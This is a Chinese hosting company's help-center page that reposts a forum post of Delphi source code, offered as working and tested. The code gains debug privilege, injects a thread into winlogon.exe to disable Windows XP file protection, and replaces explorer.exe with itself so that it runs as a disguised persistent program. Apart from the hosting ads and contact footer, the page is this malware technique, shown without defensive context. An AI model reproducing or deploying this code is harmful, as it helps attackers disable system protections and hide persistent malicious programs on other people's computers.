始创于2000年 股票代码:831685
咨询热线:0371-60135900 注册有礼 登录
  • 挂牌上市企业
  • 60秒人工响应
  • 99.99%连通率
  • 7*24h人工
  • 故障100倍补偿
您的位置: 网站首页 > 帮助中心>文章内容

关闭XP保护 替换explorer.exe

发布时间:  2012/6/23 18:24:13

在偶的VPC上测试是可以的。没有更多的测试.
  偶并没有调用dllcache目录下的.你喜欢吧
  {*******************************************************}
  { }
  { 关闭XP保护。替换explorer.exe }
  { }
  { 版权所有 (C) 2008 bbs.secdst.net }
  { }
  {*******************************************************}
  program Project1;
  uses
  Windows,TlHelp32;
  function LowerCase(const S: string): string; //转小写
  var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
  begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <>0 do
  begin
  Ch := Source^;
  if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
  Dest^ := Ch;
  Inc(Source);
  Inc(Dest);
  Dec(L);
  end;
  end;
  function CreatedMutexEx(MutexName: Pchar): Boolean;
  var
  MutexHandle: dword;
  begin
  MutexHandle := CreateMutex(nil, True, MutexName);
  if MutexHandle <>0 then
  begin
  if GetLastError = ERROR_ALREADY_EXISTS then
  begin
  //CloseHandle(MutexHandle);
  Result := False;
  Exit;
  end;
  end;
  Result := True;
  end;
  function GetWinPath: string; //取WINDOWS目录
  var
  Buf: array[0..MAX_PATH] of char;
  begin
  GetWindowsDirectory(Buf, MAX_PATH);
  Result := Buf;
  if Result[Length(Result)]<>'\' then Result := Result + '\';
  end;
  function GetTempDirectory: string; //取临时目录
  var
  Buf: array[0..MAX_PATH] of char;
  begin
  GetTempPath(MAX_PATH,Buf);
  Result := Buf;
  if Result[Length(Result)]<>'\' then Result := Result + '\';
  end;
  function EnableDebugPriv : Boolean; //提权为DEBUG
  var
  hToken : THANDLE;
  tp : TTokenPrivileges;
  rl : Cardinal;
  begin
  result := false;
  OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
  if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
  begin
  tp.PrivilegeCount := 1;
  tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
  end;
  end;
  procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
  var
  TID: LongWord;
  hSfc,hThread: HMODULE;
  pfnCloseEvents: Pointer;
  begin
  hSfc := LoadLibrary('sfc_os.dll');
  pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
  FreeLibrary(hSfc);
  hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
  WaitForSingleObject(hThread, 4000);
  end;
  procedure InitProcess(Name: string); //查找winlogon.exe进程PID
  var
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  ProcessHandle:dword;
  begin
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
  if Process32First(FSnapshotHandle,FProcessEntry32) then begin
  repeat
  If Name = LowerCase(FProcessEntry32.szExeFile) then
  begin
  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
  InjectThread(ProcessHandle);
  CloseHandle(ProcessHandle);
  Break;
  end;
  until not Process32Next(FSnapshotHandle,FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
  end;
  const ExpFile = 'explorer.exe';
  MasterMutex = 'OpenSoul';
  var
  s: string;
  begin
  if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
  if not EnableDebugPriv then Exit; //提权失败退出
  InitProcess('winlogon.exe') ;//注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
  s := ParamStr(0) ;//取本名
  if LowerCase(s) <>LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
  begin //如果不是
  MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
  CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;//把自己复制到windows目录 为explorer.exe
  end;
  WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //运行真正的explorer.exe
  end.

亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888
   联系:亿恩小凡
   QQ:89317007
   电话:0371-63322206


本文出自:亿恩科技【www.enkj.com】

服务器租用/服务器托管中国五强!虚拟主机域名注册顶级提供商!15年品质保障!--亿恩科技[ENKJ.COM]

  • 您可能在找
  • 亿恩北京公司:
  • 经营性ICP/ISP证:京B2-20150015
  • 亿恩郑州公司:
  • 经营性ICP/ISP/IDC证:豫B1.B2-20060070
  • 亿恩南昌公司:
  • 经营性ICP/ISP证:赣B2-20080012
  • 服务器/云主机 24小时售后服务电话:0371-60135900
  • 虚拟主机/智能建站 24小时售后服务电话:0371-60135900
  • 专注服务器托管17年
    扫扫关注-微信公众号
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 亿恩科技 版权所有  地址:郑州市高新区翠竹街1号总部企业基地亿恩大厦  法律顾问:河南亚太人律师事务所郝建锋、杜慧月律师   京公网安备41019702002023号
      1
     
     
     
     

    0371-60135900
    7*24小时客服服务热线